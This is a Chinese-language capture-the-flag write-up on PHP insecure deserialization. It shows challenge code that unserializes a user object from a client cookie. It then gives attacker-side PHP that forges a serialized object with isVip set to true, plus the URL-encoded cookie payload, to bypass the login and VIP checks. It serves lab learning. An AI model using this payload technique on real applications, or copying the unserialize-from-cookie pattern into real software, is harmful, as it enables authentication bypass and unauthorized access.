- 代码审计
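```php
<?php
// Challenge source. Error output is silenced and the file prints its own source
// so it can be audited; flag.php is included for the $flag the class reads later
// (its contents are not shown on this page).
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');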
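// Target class. The instance used by the challenge is produced by unserialize()
// on a cookie the client sends, so every property below -- including $isVip --
// is effectively client-supplied input rather than server-side state.
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    // Returns the stored VIP flag unchanged; nothing validates where it came from.
    public function checkVip(){
        return $this->isVip;
    }

    // Compares the supplied credentials with the object's own username/password
    // using strict equality. Because the object is deserialized from the cookie,
    // the caller controls both sides of the comparison, so a match proves nothing.
    // Note: isVip is neither consulted nor returned here.
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }

    // Prints the flag when $isVip is truthy, otherwise a refusal message.
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}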
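// Credentials are taken straight from the query string; the isset() check
// further down is the only validation they receive.
$username=$_GET['username'];
$password=$_GET['password'];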
// 前面定义的类和上一题类似
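// Only proceed when both query parameters are present.
if(isset($username) && isset($password)){
    // ROOT CAUSE: the "user" object is rebuilt from a client-controlled cookie with
    // unserialize(), so the client chooses username, password and isVip. (If the
    // cookie is absent or malformed, unserialize() yields false and the method call
    // below throws an Error; error_reporting(0) keeps that from being displayed.)
    $user = unserialize($_COOKIE['user']);
    // "Authentication": compares the GET parameters with values taken from the same
    // cookie, so any matching pair the attacker picks passes.
    if($user->login($username,$password)){
        // Authorization is read from the deserialized object as well. When login
        // succeeds but isVip is falsy nothing is printed at all.
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}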
```
2. 简单分析一下：代码先校验 `GET` 传入的 `username`、`password` 是否有值，然后对 Cookie `user` 的值做 `unserialize()` 还原成对象，再调用成员函数把对象中的 `username`、`password` 与 GET 参数比较，最后在 `isVip` 为真时输出 flag。关键在于被反序列化的对象完全来自客户端 Cookie，因此 `username`、`password` 和 `isVip` 三个属性都由攻击者控制，`login()` 的比较和 `checkVip()` 的判断都不构成真正的校验。
```php
#所以这里我们进行序列化赋值给cookie
<?php
# Attacker-side copy of the target class: same name and same property order, so
# serialize() emits an object the server's unserialize() maps onto ctfShowUser.
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
# isVip must be true here: the target's login() never sets or returns it, and
# unserialize() restores whatever value the cookie carries.
public $isVip=true;
}
# Build the forged user object, serialize it, and URL-encode the result: the raw
# serialized form contains ';' and '"', which a Cookie header cannot carry verbatim.
$payload = serialize(new ctfShowUser());
echo urlencode($payload);
?>
#输出
#O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
```
利用工具（如 Burp 或浏览器开发者工具）把上面输出的值作为 Cookie `user` 提交，同时 GET 参数 `username=xxxxxx&password=xxxxxx` 需与序列化对象中的值保持一致，服务端即输出 flag。